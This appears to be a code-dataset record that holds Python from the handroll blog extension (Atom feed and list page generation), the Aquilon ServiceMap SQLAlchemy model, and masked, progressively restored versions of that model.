FeedBuilder(self.atom_metadata)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.atom_output)\n builder.write_to(output_file)\n\n def _generate_list_page(self, director, blog_posts):\n \"\"\"Generate the list page.\"\"\"\n logger.info(_('Generating blog list page ...'))\n template = director.catalog.get_template(self.list_template)\n builder = ListPageBuilder(template)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.list_output)\n builder.write_to(output_file)\n\n def _add_atom_metadata(self, name, option):\n \"\"\"Add atom metadata from the config parser.\"\"\"\n self.atom_metadata[name] = self._get_option(option)\n\n def _get_option(self, option):\n \"\"\"Get an option out of the blog section.\"\"\"\n try:\n return self._config.parser.get('blog', option)\n except configparser.NoOptionError:\n raise AbortError(_(\n 'The blog extension requires the {option} option.').format(\n option=option))\n\n\nclass BlogBuilder(object):\n \"\"\"A template pattern class for generating output related to a blog.\"\"\"\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom 
feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(summary=post.summary, title=post.title,\n title_type='html', url=post.url, updated=post.date))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(u'<li><a href=\"{route}\">{title}</a></li>'.format\n (route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {'blog_list': self._blog_list, 'posts': self._posts}\n return self._template.render(context)\n", "step-5": "# Copyright (c) 2017, Matt Layman\n\nimport bisect\nimport configparser\nimport os\n\nimport smartypants\nfrom werkzeug.contrib.atom import AtomFeed, FeedEntry\n\nfrom handroll import logger\nfrom handroll.exceptions import AbortError\nfrom handroll.extensions.base import Extension\nfrom handroll.i18n import _\n\n\nclass BlogPost(object):\n\n def __init__(self, **kwargs):\n self.date = kwargs['date']\n self.source_file = kwargs['source_file']\n self.summary = smartypants.smartypants(kwargs['summary'])\n self.title = smartypants.smartypants(kwargs['title'])\n self.route = kwargs['route']\n self.url = kwargs['url']\n # Having the posts enables a blog post to find its relationships.\n self._posts = kwargs['posts']\n\n def __eq__(self, other):\n if other is None:\n return False\n return self.__dict__ == other.__dict__\n\n def __lt__(self, other):\n return self.date < other.date\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return 'BlogPost({}, {})'.format(self.source_file, self.date)\n\n @property\n def next(self):\n \"\"\"Get the next chronological blog post.\"\"\"\n posts_by_date = self.posts_by_date\n index = bisect.bisect_left(posts_by_date, self)\n if index + 1 == len(posts_by_date):\n return None\n return posts_by_date[index + 1]\n\n @property\n def previous(self):\n \"\"\"Get the previous chronological blog post.\"\"\"\n posts_by_date = self.posts_by_date\n index = bisect.bisect_left(posts_by_date, self)\n if index == 0:\n return None\n return posts_by_date[index - 1]\n\n @property\n def posts_by_date(self):\n return sorted(self._posts.values(), key=lambda p: p.date)\n\n\nclass BlogExtension(Extension):\n \"\"\"Track files marked as blog entries and generate a feed.\"\"\"\n\n handle_frontmatter_loaded = True\n handle_pre_composition = True\n handle_post_composition = True\n\n required_metadata = {\n 'author': 'atom_author',\n 'id': 'atom_id',\n 'title': 'atom_title',\n 'url': 'atom_url',\n }\n\n def __init__(self, config):\n super(BlogExtension, self).__init__(config)\n self.posts = {}\n self.atom_metadata = {}\n self.atom_output = ''\n self.list_template = None\n self.list_output = None\n self._resolver = None\n self._should_generate = True\n\n def on_pre_composition(self, director):\n \"\"\"Check that all the required configuration exists.\"\"\"\n if not self._config.parser.has_section('blog'):\n raise AbortError(\n _('A blog section is missing in the configuration file.'))\n\n # Collect atom feed configuration.\n for metadata, option in 
self.required_metadata.items():\n self._add_atom_metadata(metadata, option)\n self.atom_output = self._get_option('atom_output')\n\n # Collect HTML listing configuration.\n if self._config.parser.has_option('blog', 'list_template'):\n self.list_template = self._get_option('list_template')\n self.list_output = self._get_option('list_output')\n\n # Grab the resolver from the director for determining URLs for posts.\n self._resolver = director.resolver\n\n def on_frontmatter_loaded(self, source_file, frontmatter):\n \"\"\"Record any new blog posts.\"\"\"\n if not self._is_post(frontmatter):\n return\n self._validate_post(source_file, frontmatter)\n post = BlogPost(\n date=frontmatter['date'],\n source_file=source_file,\n summary=frontmatter.get('summary', ''),\n title=frontmatter['title'],\n route=self._resolver.as_route(source_file),\n url=self._resolver.as_url(source_file),\n posts=self.posts,\n )\n frontmatter['post'] = post\n if post != self.posts.get(source_file):\n self.posts[source_file] = post\n self._should_generate = True\n\n def on_post_composition(self, director):\n \"\"\"Generate blog output.\"\"\"\n if not self._should_generate:\n return\n blog_posts = sorted(\n self.posts.values(), key=lambda p: p.date, reverse=True)\n self._generate_atom_feed(director, blog_posts)\n if self.list_template is not None:\n self._generate_list_page(director, blog_posts)\n self._should_generate = False\n\n def _is_post(self, frontmatter):\n \"\"\"Check if the front matter looks like a blog post.\"\"\"\n is_post = frontmatter.get('blog', False)\n if type(is_post) != bool:\n raise AbortError(\n _('Invalid blog frontmatter (expects True or False): '\n '{blog_value}').format(blog_value=is_post))\n return is_post\n\n def _validate_post(self, source_file, frontmatter):\n \"\"\"Validate that the post contains all the required fields.\"\"\"\n required = set([\n 'date',\n 'title',\n ])\n fields = set(frontmatter.keys())\n missing = required - fields\n if missing:\n raise AbortError(_(\n 'The blog post, {filename}, '\n 'is missing required fields: {missing_fields}'.format(\n filename=source_file, missing_fields=', '.join(missing))))\n\n def _generate_atom_feed(self, director, blog_posts):\n \"\"\"Generate the atom feed.\"\"\"\n logger.info(_('Generating Atom XML feed ...'))\n builder = FeedBuilder(self.atom_metadata)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.atom_output)\n builder.write_to(output_file)\n\n def _generate_list_page(self, director, blog_posts):\n \"\"\"Generate the list page.\"\"\"\n logger.info(_('Generating blog list page ...'))\n template = director.catalog.get_template(self.list_template)\n builder = ListPageBuilder(template)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.list_output)\n builder.write_to(output_file)\n\n def _add_atom_metadata(self, name, option):\n \"\"\"Add atom metadata from the config parser.\"\"\"\n self.atom_metadata[name] = self._get_option(option)\n\n def _get_option(self, option):\n \"\"\"Get an option out of the blog section.\"\"\"\n try:\n return self._config.parser.get('blog', option)\n except configparser.NoOptionError:\n raise AbortError(\n _('The blog extension requires the {option} option.').format(\n option=option))\n\n\nclass BlogBuilder(object):\n \"\"\"A template pattern class for generating output related to a blog.\"\"\"\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise 
NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(\n summary=post.summary,\n title=post.title,\n title_type='html',\n url=post.url,\n updated=post.date,\n ))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(\n u'<li><a href=\"{route}\">{title}</a></li>'.format(\n route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {\n 'blog_list': self._blog_list,\n 'posts': self._posts,\n }\n return self._template.render(context)\n", "step-ids": [ 13, 24, 28, 32, 38 ] }
[ 13, 24, 28, 32, 38 ]
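The handroll blog extension in the record above reads every setting from a [blog] section through self._config.parser; the option names are fixed by required_metadata and on_pre_composition, while the concrete values are up to the site. A minimal sketch of such a section, parsed the same way the extension would see it (all values are placeholders, only the option names come from the code above):

# Placeholder [blog] section; option names taken from required_metadata
# and on_pre_composition, values invented for illustration.
import configparser

conf = configparser.ConfigParser()
conf.read_string("""
[blog]
atom_author = A. Writer
atom_id = urn:uuid:00000000-0000-0000-0000-000000000000
atom_title = Example Blog
atom_url = https://example.com/feed.xml
atom_output = feed.xml
list_template = blog_list.j2
list_output = blog/index.html
""")

# mirrors the lookups done by _get_option
assert conf.get('blog', 'atom_output') == 'feed.xml'
assert conf.has_option('blog', 'list_template')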
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*- # ex: set expandtab softtabstop=4 shiftwidth=4: # # Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Maps service instances to locations. See class.__doc__ """ from collections import defaultdict from datetime import datetime from sys import maxsize from sqlalchemy import (Column, Integer, Sequence, DateTime, ForeignKey, UniqueConstraint, CheckConstraint) from sqlalchemy.orm import (relation, deferred, backref, defer, undefer, lazyload, contains_eager, object_session) from sqlalchemy.sql import and_, or_, null, case from sqlalchemy.sql.functions import coalesce from aquilon.exceptions_ import InternalError, AquilonError from aquilon.aqdb.model import (Base, Location, Desk, Rack, Room, Bunker, Building, City, Campus, Country, Continent, Hub, Organization, ServiceInstance, Network, Personality, PersonalityServiceListItem, HostEnvironment) _TN = 'service_map' # TODO: We could calculate this map by building a graph of Location subclasses # using Location.valid_parents as edges, and then doing a topological sort # NOTE: The actual values here are unimportant, what matters is their order _LOCATION_PRIORITY = { # Rack and Desk are at the same level Rack: 1000, Desk: 1000, Room: 1100, Bunker: 1200, Building: 1300, City: 1400, Campus: 1500, Country: 1600, Continent: 1700, Hub: 1800, Organization: 1900, } # NOTE: The actual value here is unimportant, what matters is the order wrt. # location-based priorities _NETWORK_PRIORITY = 100 # NOTE: The actual values here are unimportant, only their order matters _TARGET_PERSONALITY = 10 _TARGET_ENVIRONMENT = 100 _TARGET_GLOBAL = 1000 class ServiceMap(Base): """ Service Map: mapping a service_instance to a location. The rows in this table assert that an instance is a valid useable default that clients can choose as their provider during service autoconfiguration. The contained information is actually a triplet: - The service instance to use, - Rules for the scope where the map is valid, - Rules for which objects does the map apply. 
""" __tablename__ = _TN id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True) service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete='CASCADE'), nullable=False) personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'), nullable=True, index=True) host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True) location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'), nullable=True, index=True) network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'), nullable=True, index=True) creation_date = deferred(Column(DateTime, default=datetime.now, nullable=False)) service_instance = relation(ServiceInstance, innerjoin=True, backref=backref('service_map', cascade="all, delete-orphan", passive_deletes=True)) personality = relation(Personality) host_environment = relation(HostEnvironment) location = relation(Location) network = relation(Network) __table_args__ = (UniqueConstraint(service_instance_id, personality_id, host_environment_id, location_id, network_id, name='%s_uk' % _TN), # At most one of personality_id and host_environment_id # can be not NULL CheckConstraint(case([(personality_id != null(), 1)], else_=0) + case([(host_environment_id != null(), 1)], else_=0) <= 1, name='%s_target_ck' % _TN)) @property def service(self): return self.service_instance.service @property def scope_priority(self): if self.network: return _NETWORK_PRIORITY else: try: return _LOCATION_PRIORITY[type(self.location)] except KeyError: # pragma: no cover raise InternalError("The service map is not prepared to handle " "location class %r" % type(self.location)) @property def object_priority(self): if self.personality: return _TARGET_PERSONALITY elif self.host_environment: return _TARGET_ENVIRONMENT else: return _TARGET_GLOBAL @property def priority(self): return (self.object_priority, self.scope_priority) @property def scope(self): if self.location: return self.location else: return self.network def __init__(self, service_instance, network=None, location=None, personality=None, host_environment=None): if network and location: # pragma: no cover raise AquilonError("A service can't be mapped to a Network and a " "Location at the same time") if network is None and location is None: # pragma: no cover raise AquilonError("A service should by mapped to a Network or a " "Location") if personality and host_environment: # pragma: no cover raise AquilonError("A service can't be mapped to a Personality and " "a HostEnvironment at the same time") super(ServiceMap, self).__init__(service_instance=service_instance, network=network, location=location, personality=personality, host_environment=host_environment) @staticmethod def get_location_mapped_instances(dbservice, dblocation): # Simplified service map lookup - single service, location-based maps # only, no client bindings session = object_session(dbservice) location_ids = [loc.id for loc in dblocation.parents] location_ids.append(dblocation.id) q = session.query(ServiceMap) q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.host_environment_id == null())) q = q.filter(ServiceMap.location_id.in_(location_ids)) q = q.join(ServiceInstance) q = q.filter_by(service=dbservice) q = q.options(contains_eager('service_instance'), defer('service_instance.comments'), lazyload('service_instance.service')) instances = [] min_seen_priority = (maxsize,) # We want the instance(s) with the lowest priority for map in q: si = map.service_instance if min_seen_priority > map.priority: instances = [si] min_seen_priority = 
map.priority elif min_seen_priority == map.priority: instances.append(si) return instances @staticmethod def get_mapped_instance_cache(dbservices, dbstage, dblocation, dbnetwork=None): """Returns dict of requested services to closest mapped instances.""" session = object_session(dblocation) location_ids = [loc.id for loc in dblocation.parents] location_ids.append(dblocation.id) PSLI = PersonalityServiceListItem q = session.query(ServiceMap) q = q.join(ServiceInstance) q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in dbservices)) q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id, PSLI.service_id == ServiceInstance.service_id)) # Rules for filtering by target object q = q.filter(or_( and_(ServiceMap.personality_id == null(), ServiceMap.host_environment_id == null()), ServiceMap.personality == dbstage.personality, ServiceMap.host_environment_id == coalesce( PSLI.host_environment_id, dbstage.personality.host_environment.id))) # Rules for filtering by location/scope if dbnetwork: q = q.filter(or_(ServiceMap.location_id.in_(location_ids), ServiceMap.network_id == dbnetwork.id)) else: q = q.filter(ServiceMap.location_id.in_(location_ids)) q = q.options(contains_eager('service_instance'), defer('service_instance.comments'), undefer('service_instance._client_count'), lazyload('service_instance.service')) instance_cache = {} instance_priority = defaultdict(lambda: (maxsize,)) # For every service, we want the instance(s) with the lowest priority for map in q: si = map.service_instance service = si.service if instance_priority[service] > map.priority: instance_cache[service] = [si] instance_priority[service] = map.priority elif instance_priority[service] == map.priority: instance_cache[service].append(si) return instance_cache
normal
{ "blob_id": "a9e0659c6a18ffc954079845b7d0de04c46a78c9", "index": 7204, "step-1": "<mask token>\n\n\nclass ServiceMap(Base):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = 
q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n", "step-2": "<mask token>\n\n\nclass ServiceMap(Base):\n <mask token>\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n 
session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n", "step-3": "<mask token>\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = 
relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n 
ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n", "step-4": "<mask token>\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom sys import maxsize\nfrom sqlalchemy import Column, Integer, Sequence, DateTime, ForeignKey, UniqueConstraint, CheckConstraint\nfrom sqlalchemy.orm import relation, deferred, backref, defer, undefer, lazyload, contains_eager, object_session\nfrom sqlalchemy.sql import and_, or_, null, case\nfrom sqlalchemy.sql.functions import coalesce\nfrom aquilon.exceptions_ import InternalError, AquilonError\nfrom aquilon.aqdb.model import Base, Location, Desk, Rack, Room, Bunker, Building, City, Campus, Country, Continent, Hub, Organization, ServiceInstance, Network, Personality, PersonalityServiceListItem, HostEnvironment\n_TN = 'service_map'\n_LOCATION_PRIORITY = {Rack: 1000, Desk: 1000, Room: 1100, Bunker: 1200,\n Building: 1300, City: 1400, Campus: 1500, Country: 1600, Continent: \n 1700, Hub: 1800, Organization: 1900}\n_NETWORK_PRIORITY = 100\n_TARGET_PERSONALITY = 10\n_TARGET_ENVIRONMENT = 100\n_TARGET_GLOBAL = 1000\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = 